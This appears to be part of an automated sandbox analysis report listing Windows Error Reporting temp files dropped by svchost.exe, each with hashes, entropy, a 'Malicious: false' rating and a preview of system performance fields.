SSDEEP:	96:TiZYWIqzLBWQYQYvWuHhYEZIVtAio4ZPV4wJfnoavfahmMMgSh2IU1hS:2ZDIMnHDAavirMgSHU1w
MD5:	424AB12B1454D93A8287E912C729A131
SHA1:	E7698EC767A1563398DAF0EE904E45CC7F413F42
SHA-256:	D2A2098316089BD440921E88F442A8809803ADF800484338185278DB55DDFEA5
SHA-512:	7CE9914258AF65620DFE5120A34601A7FF4F92010DF547A5562BC1F9D17C7DC91DA6C054EDB1090ACAC583DD466B912BEEB24BD77DC8D21C05037FB74C18ABA9
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER65AA.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	95544
Entropy (8bit):	3.0568434333024204
Encrypted:	false
SSDEEP:	1536:kcIJJ3DEZzhzBqGYrh1/IOUYAQziTBzqbN5ltRQ/k:kcIJJ3DEZzhzBqGYrh1/IOUYAQzYBzqH
MD5:	7801FCC6C7305D4677D8E5354CE6F182
SHA1:	0D2FF301BCA1CFC4FC56AD0DD9133F4BAE843E5A
SHA-256:	628F2BEBD4E6E5AC140A4B2933E3D46415F96F9675B04E9C92225CF2CADD572A
SHA-512:	B12B75A110E22FDA4EF97902517C1294BF97A673660385190D91F19B51B5EE81706E2392090A7F06F56DBC5057172DEFEE15C18381A3DD8297DE30761A4C3313
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6666.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.69459795460986
Encrypted:	false
SSDEEP:	96:TiZYWaRCguYYYFWxHXYEZd6tAiK4RPVQ0wSF8aofahsMSSh3Ii1hS:2ZDNP9GGaoiqMSSOi1w
MD5:	FE479F1672A53474B5910BE1992459AA
SHA1:	1CBABA0C1EAEB5004C96D21D4B0171C5205A95E4
SHA-256:	DB4457A93C045FE095841677DCECC0AD701630FAA7558798CCCBF2DD94D1993B
SHA-512:	807C3C49D840E7A5574C10E3641730797E4C0CAD2DB8D594F2A0B1B891D6BD057F925DB8A809A27CDFBD723E0036C107F0EE108DE0580083C074FB613B47E551
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER68E8.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	95166
Entropy (8bit):	3.0575138648022784
Encrypted:	false
SSDEEP:	1536:l5uJ2nEZj2nzX8AhM1Iw0I+PwtMTBzqbSujHRkXk:l5uJ2nEZj2nzX8AhM1Iw0I+PwtKBzqbb
MD5:	7F1C0AE714849FCF94DD6D813EC5CD6C
SHA1:	111041C29358ED70F978E2B629D7376CA5B5438F
SHA-256:	C9936FB75D04C30ACFC431E2BD011A9B8680FF07F3B22B4AD7C08016AA620EF0
SHA-512:	840979E945B794847D3548EEB7D71CE1C0A0B841A39ABDCA499C98695B1A57489F016F381275F37CBE61DFC0FAE7C7A5DAF6A1C030737DEF079237C308F96D9C
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER69D3.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.694651123100902
Encrypted:	false
SSDEEP:	96:TiZYWSjrTHQYqYaWMlEHtYEZZhBtAiA4PPV5wXB2Pfa3fah+ZYM0ShuIS1hS:2ZDSMtnlQh6Ya3i42M0SPS1w
MD5:	58A4BF0CBB3E3B68D36AD298BB50BD83
SHA1:	A2736C6A5DF0131C83B444DCC6AA045CC350AF08
SHA-256:	30782AD07D1C7201F6105B9378F9F0BC83ED78D746FE267D9190317C0A6B26F2
SHA-512:	1D333CD79D7C3DF3614094F56B67AD44BDC6EEF1FC33F5C98D0BE65E1AA18DDDB9E27C82D2236C69E54D7F2AC49869BD7801545B1AACAF282A78F66B5A4369C6
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8329.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	98770
Entropy (8bit):	3.054409101430315
Encrypted:	false
SSDEEP:	3072:4zJAyZRbYBsmB8Ih65Ihwggw1KBzqbL8onRs3ve3gPmU:0
MD5:	CD67D255649B4CD3DA1827D1253DA98B
SHA1:	835450A39908AF2990DC39091CCF398B4DA61E24
SHA-256:	0DADE152467817DFC11A7E95C2436626C18BFFA4A5E93D6722138FFADDC1CBD1
SHA-512:	028C7EBC3DC74758D0DD24A19989F27138EC2403BD52A54DC41B7816FF90AFEC8B2CA75A8BEF8066E1FA4052835F6E0DD8EFFEFEF7758963F9D50D85F63FABCE
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER859B.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	99462
Entropy (8bit):	3.054125555166594
Encrypted:	false
SSDEEP:	3072:8YJAyZRbYBsmB8Mh6xIdlggw1KBzqbHFn72RWpvXgEQ:+
MD5:	E659B5403B696F55832585123A40E524
SHA1:	DC8E08CD00BDD568F46985CCEAE297CA89BDD363
SHA-256:	F2DF8621F6DE031F9E27F11BBA46072594B57DA4EA1D8B7C09CF3B0AA4E66D58
SHA-512:	29C0755254C64BB6890AB3B2C91A513E54B485869001ED9884798A89FE0771BFB2AA3F028A3A62CD0C3EDF851F93DDB5C709FDC3CE170F44052ABACC5BC0DC4A
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER87FD.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.694265545331016
Encrypted:	false
SSDEEP:	96:TiZYW8F8NRxI9YqYmWF0HjYEZ54tAid4XPV/wPV+ayfa+MHeBIM10:2ZD8FJdbW0ayi+MHe+M10
MD5:	B8E132F7900400E484A3907A04649987
SHA1:	DF2677BE6479E7BC4CCAFBC5D1947508BEB9A6E0
SHA-256:	20894E489D94BCB3E1B64F16571D6466494648CE6FCE2C4195D3942D1548E6C9
SHA-512:	45517A8BD4096ECE9B7C421899C97D288ADB440E6DFE9AA52E66EBDA508F81908949F741B5BD53D3CE46F7AEA55AD504368E7CE277502BE2D7417E1C0616BB1A
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8927.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.695211429160031
Encrypted:	false
SSDEEP:	96:TiZYW8/wn3E3YgDYZYWFYHjYEZP2tAiC4XPV/wq/DZajfaUMsehId10:2ZD8hHDeOoLZajiUMseed10
MD5:	DE44BD4F5F0A3DFD47AF4D4ACA47BCCA
SHA1:	E1FED58AF4C2417946DA443B30BB1928DD5FD65B
SHA-256:	5081EAA62D1A0FDEBB10CF69E5C5064D5DE384C4B3E7F81E0F5C760F75D98AB0
SHA-512:	D71F2BBB5817BC3B050D124D971DB9DC4D1233D147465BE17D0FCDDC87EBEC79A579FF045B1827F4BD558723FDEB8302C5AC17E04A125A368FDF409D48AF7EC5
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8938.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	98480
Entropy (8bit):	3.0554228791863456
Encrypted:	false
SSDEEP:	3072:CxJcyZ8bYaPB8fhX6IdpYgwdKBzqbIoU97RHgvEv:k
MD5:	FC4B84D2B5531252525DB0B098EA292C
SHA1:	E5CDC09F881AD778002162490C4F0E6D25BAF625
SHA-256:	D7BF99E86EABE728FFEB1983EB35254AF5A53FD94759712497F0014FE666ABD4
SHA-512:	CE77301455C1F44152467A7AD1A54087322AB0D78DD50421EED50C1D3337FAFF8721A9C2AEE03B2502407416DA7E89BFE352A3D3A04ED28E08D01E1CFC62F21E
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D8E.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6950586646173433
Encrypted:	false
SSDEEP:	96:TiZYW8fsz5nY6TYOUZWDIHjYEZj4tAi74yPVGwzKj2ajfagMNLeOIhZ1e:2ZD8eTTnfO4o2ajigMpeZhZ1e
MD5:	35614C0BA73D449C61A7F2696811C482
SHA1:	A3B11BEDAADAD325D4EAA89724A930E62819D679
SHA-256:	2F324708347A7D5999513E1084E1EE3F9187678F20438D1AB2C09598DC3495F1
SHA-512:	E30F6B75F71DC782E61ABD72274BF481C592713F5844417E0C0B69A5A224470E65DF547F7ADEC6536F7A95957B56127FFA4A77CA191100513C3B2AB39959BCAC
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA472.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	96908
Entropy (8bit):	3.056000484496557
Encrypted:	false
SSDEEP:	1536:YGTzy2vZ3HilT4cn4hxbmD95igOKiMTBzqbBFd1rrRnvdO5:YGTzy2vZ3HilT4cn4hxbmD95igOKiKBF
MD5:	1342B64AD5BABBB6A0320809B1CDFC0D
SHA1:	0A66348A2D30F115DEAA749A721571A715099A96
SHA-256:	3D07E2B838BB0F871D149CEC7D06EFD0E3DC67B536AEAC31DEF25A81DA9EEEB9
SHA-512:	5045DBA0CD7459E84B432CEBD0546B3619C57980F0FDFE1B69BF819491CF77362584BBDA3FB3CA139FC528C9C346DEA25C01BC17E6586153A9DCC1C26249E02C
Malicious:	false
Reputation:	unknown
